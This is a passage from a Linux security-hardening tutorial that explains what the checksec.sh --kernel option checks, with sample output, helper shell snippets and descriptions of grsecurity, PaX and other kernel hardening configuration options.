One of the more interesting arguments is --kernel, which is used to check the kernel configuration options. When this option is used, the checksec.sh script looks for the kernel .config file in the following order: /proc/config.gz, /boot/config-<version> and /usr/src/linux/.config, where <version> is the kernel version. It first checks whether the /proc/config.gz file exists, which contains the configuration of the currently running kernel. If that file doesn’t exist, it checks the /boot/ directory for the configuration file of the currently running kernel version. After that, it checks the /usr/src/linux/ directory, which should point to the current kernel sources.
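The lookup order just described can be sketched as a small shell helper. This is not code from checksec.sh itself, just an illustration of the order in which the candidate paths are tried:

```shell
#!/bin/sh
# Print the first existing file from the argument list, mirroring the
# order in which checksec.sh searches for the kernel .config.
find_first_config() {
    for cfg in "$@"; do
        if [ -e "$cfg" ]; then
            printf '%s\n' "$cfg"
            return 0
        fi
    done
    return 1
}

# The search order described above; falls back to a message if none exist.
find_first_config /proc/config.gz "/boot/config-$(uname -r)" \
    /usr/src/linux/.config || echo "no kernel config found"
```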
The result of running checksec.sh with the --kernel option can be seen below, where /usr/src/linux/.config was found and examined. Note that this was run on the gentoo-sources kernel and not on a hardened kernel.

# ./checksec.sh --kernel
* Kernel protection information:

Description - List the status of kernel protection mechanisms. Rather than
inspect kernel mechanisms that may aid in the prevention of exploitation of
userspace processes, this option lists the status of kernel configuration
options that harden the kernel itself against attack.

Kernel config: /usr/src/linux/.config

Warning: The config on disk may not represent running kernel config!

GCC stack protector support: Enabled
Strict user copy checks: Disabled
Enforce read-only kernel data: Enabled
Restrict /dev/mem access: Disabled
Restrict /dev/kmem access: Disabled

* grsecurity / PaX: No GRKERNSEC

The grsecurity / PaX patchset is available here:
http://grsecurity.net/

* Kernel Heap Hardening: No KERNHEAP

The KERNHEAP hardening patchset is available here:
https://www.subreption.com/kernheap/

Most of the hardened options are disabled, since we’re running the normal kernel and not the hardened one. If Grsecurity and PaX are enabled in the kernel, all of their options are also checked; that isn’t visible in the output above, because PaX is disabled.
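Such checks can also be done by hand with a quick grep over the .config file. The helper below is a simple sketch, not part of checksec.sh; the option names and the conventional /usr/src/linux/.config path are used for illustration:

```shell
#!/bin/sh
# Report whether each given CONFIG_* option is set to 'y' in a kernel .config.
check_kernel_opts() {
    config="$1"
    shift
    for opt in "$@"; do
        if grep -q "^${opt}=y" "$config" 2>/dev/null; then
            echo "$opt: enabled"
        else
            echo "$opt: disabled or not set"
        fi
    done
}

# Example invocation, only if a kernel source tree is actually present:
if [ -f /usr/src/linux/.config ]; then
    check_kernel_opts /usr/src/linux/.config \
        CONFIG_CC_STACKPROTECTOR CONFIG_DEBUG_RODATA CONFIG_GRKERNSEC
fi
```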
The checksec.sh script checks for the following configuration variables in the .config file:

# cat checksec.sh | grep "CONFIG_" | sed 's/.*\(CONFIG_[^=]*\).*/\1/g'
CONFIG_CC_STACKPROTECTOR
CONFIG_DEBUG_STRICT_USER_COPY_CHECKS
CONFIG_DEBUG_RODATA
CONFIG_STRICT_DEVMEM
CONFIG_DEVKMEM
CONFIG_GRKERNSEC
CONFIG_GRKERNSEC_HIGH
CONFIG_GRKERNSEC_MEDIUM
CONFIG_GRKERNSEC_LOW
CONFIG_PAX_KERNEXEC
CONFIG_PAX_MEMORY_UDEREF
CONFIG_PAX_REFCOUNT
CONFIG_PAX_USERCOPY
CONFIG_GRKERNSEC_KMEM
CONFIG_GRKERNSEC_IO
CONFIG_GRKERNSEC_MODHARDEN
CONFIG_GRKERNSEC_HIDESYM
CONFIG_KERNHEAP
CONFIG_KERNHEAP_FULLPOISON

Let’s take a look at the CONFIG_DEBUG_STRICT_USER_COPY_CHECKS option in more detail. If we enter the “make menuconfig” screen, press the “/” character to start searching, and input CONFIG_DEBUG_STRICT_USER_COPY_CHECKS, we’ll be presented with the search results. They tell us that the option is available as “Strict user copy size checks” under “Kernel hacking”. If we go to that option and press the Help button, we’ll be presented with the details about it, as shown below. The first thing to notice is the “Depends on” line, which lists the options this option depends upon. If we’d like to see this option under “Kernel hacking”, we have to:

Enable ARCH_HAS_DEBUG_STRICT_USER_COPY_CHECKS
Enable DEBUG_KERNEL
Disable TRACE_BRANCH_PROFILING
Disable PAX_SIZE_OVERFLOW

Below are the Grsecurity and PaX options that we already described in the previous section, presented with their actual names as they appear in the kernel, so we can cross-reference the options.
CONFIG_GRKERNSEC: Grsecurity
CONFIG_PAX_KERNEXEC: Enforce non-executable kernel pages
CONFIG_PAX_MEMORY_UDEREF: Prevent invalid userland pointer dereference
CONFIG_PAX_REFCOUNT: Prevent various kernel object reference counter overflows
CONFIG_PAX_USERCOPY: Harden heap object copies between kernel and userland
CONFIG_GRKERNSEC_KMEM: Deny reading/writing to /dev/kmem, /dev/mem, and /dev/port
CONFIG_GRKERNSEC_IO: Disable privileged I/O
CONFIG_GRKERNSEC_MODHARDEN: Harden module auto-loading
CONFIG_GRKERNSEC_HIDESYM: Hide kernel symbols

The other, non-PaX security options are described in detail below:

CONFIG_CC_STACKPROTECTOR (Processor type and features -> Enable -fstack-protector buffer overflow detection): when enabled, this option passes the -fstack-protector flag to the gcc compiler, which puts a canary on the stack before the return address. The canary is validated when the function returns; if it has changed, it was overwritten by a stack overflow.
CONFIG_DEBUG_STRICT_USER_COPY_CHECKS (Kernel hacking -> Strict user copy size checks): when enabled, additional security checks verify the length of the arguments passed to the copy functions, to ensure the arguments are within bounds.
CONFIG_DEBUG_RODATA (Kernel hacking -> Write protect kernel read-only data structures): when enabled, kernel read-only data is marked as write-protected in the page tables, to prevent writes to that memory segment.
CONFIG_STRICT_DEVMEM (Kernel hacking -> Filter access to /dev/mem): when enabled, the kernel only allows user-space as well as kernel programs to access certain memory through /dev/mem, but not all memory, since that would be a big security misconfiguration. The only visible memory is each process’s own memory, as well as device-mapped memory.
CONFIG_DEVKMEM (Device Drivers -> Character devices -> /dev/kmem virtual device support): when enabled, the /dev/kmem virtual device is available and can be used for debugging purposes.
We usually don’t want to enable this feature.

It’s also a good idea to keep a table of all the options that “checksec.sh --kernel” checks when evaluating the security features of the kernel. The list below presents all the options reported by the “checksec.sh --kernel” command: first the exact option name reported by the checksec.sh script, then the equivalent kernel variable in parentheses, and finally a brief description of the option, so we can quickly find more information about it.

GCC stack protector support (CONFIG_CC_STACKPROTECTOR): Puts a canary on the stack, which is validated when the function returns, to prevent overwriting the saved EIP address.
Strict user copy checks (CONFIG_DEBUG_STRICT_USER_COPY_CHECKS): Additional checks on function arguments ensure they are within bounds.
Enforce read-only kernel data (CONFIG_DEBUG_RODATA): Kernel data is marked as read-only to prevent overwriting important kernel structures.
Restrict /dev/mem access (CONFIG_STRICT_DEVMEM): Limits access to memory through the /dev/mem device.
Restrict /dev/kmem access (CONFIG_DEVKMEM): Enables or disables the /dev/kmem device.
Non-executable kernel pages (CONFIG_PAX_KERNEXEC): The kernel enforces the non-executable bit on kernel pages.
Prevent userspace pointer deref (CONFIG_PAX_MEMORY_UDEREF): Prevents the kernel from directly using userland pointers.
Prevent kobject refcount overflow (CONFIG_PAX_REFCOUNT): Prevents overflowing various kinds of object reference counters.
Bounds check heap object copies (CONFIG_PAX_USERCOPY): Enforces the size of heap objects when they are copied between user and kernel land.
Disable writing to kmem/mem/port (CONFIG_GRKERNSEC_KMEM): Prevents changing the running kernel by accessing it through the /dev/kmem, /dev/mem, /dev/port and /dev/cpu/*/msr devices.
Disable privileged I/O (CONFIG_GRKERNSEC_IO): Prevents changing the running kernel through privileged I/O operations.
Harden module auto-loading (CONFIG_GRKERNSEC_MODHARDEN): Only allows privileged users to auto-load modules.
Hide kernel symbols (CONFIG_GRKERNSEC_HIDESYM): Prevents unprivileged users from getting their hands on kernel information.

We haven’t yet mentioned KernHeap, which checksec.sh reported as disabled. Linux kernel heap hardening can be implemented by a special patch called KERNHEAP, which has its own web page at [7], but it can no longer be freely downloaded from the internet. I wasn’t able to get much information, but some people on IRC said that the PaX patches include most of the things kernheap does. I’m not sure what to conclude about kernheap, but I’m sure that if it can no longer be integrated into the current kernel, it should be disabled in checksec.sh, because it only introduces confusion.

References:

[1] Hardened Gentoo, Project:Hardened - Gentoo Wiki.
[2] Security-Enhanced Linux, Wikipedia, the free encyclopedia.
[3] RSBAC, Wikipedia, the free encyclopedia.
[4] Hardened/Toolchain, https://wiki.gentoo.org/wiki/Hardened/Toolchain#RELRO.
[5] Hardened/PaX Quickstart, https://wiki.gentoo.org/wiki/Project:Hardened/PaX_Quickstart.
[6] checksec.sh, trapkit.de.
[7] KERNHEAP, http://subreption.com/products/kernheap/.
[8] Advanced Portage Features, Gentoo Linux Documentation.
[9] Elfix Homepage, elfix.
[10] Avfs: An On-Access Anti-Virus File System.
[11] EICAR Download, EICAR - European Expert Group for IT-Security.
[12] Gentoo Security Handbook, Gentoo Linux Documentation.

Source